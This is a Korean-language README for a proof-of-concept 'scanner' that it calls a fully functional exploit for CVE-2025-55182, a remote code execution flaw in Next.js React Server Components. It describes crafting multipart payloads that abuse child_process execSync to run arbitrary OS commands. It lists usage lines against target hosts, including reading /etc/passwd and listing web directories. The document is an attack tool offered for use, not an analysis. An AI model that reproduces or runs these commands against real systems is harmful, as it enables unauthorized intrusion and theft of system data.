
POC-CVE-2025-55182
CVE-2025-55182 고급 스캐너
CVE-2025-55182 — Next.js의 React Server Components를 통한 원격 코드 실행(RCE)을 위한 완전한 기능을 갖춘 익스플로잇 유틸리티입니다. 이 스캐너는 multipart 페이로드를 자동으로 생성하고 process.mainModule.require('child_process').execSync()를 악용하여 취약한 인스턴스에서 임의의 OS 명령어 실행을 달성합니다.
기능
자동 페이로드 생성기 — 수동 인코딩 불필요 명령어 실행 및 STDOUT의 깔끔한 추출 자동 프로토콜 감지(누락 시 https:// 자동 적용) 정확한 URL 디코딩 + 개행 복원 신속한 운영자 피드백을 위한 컬러 출력 오류 핑거프린팅 (500 / 403 / SSL / 타임아웃 / WAF 패턴)
설치 chmod +x scanner.sh
사용법
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
옵션

예제
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
부담 없이 mailto:[email protected]으로 연락 주세요.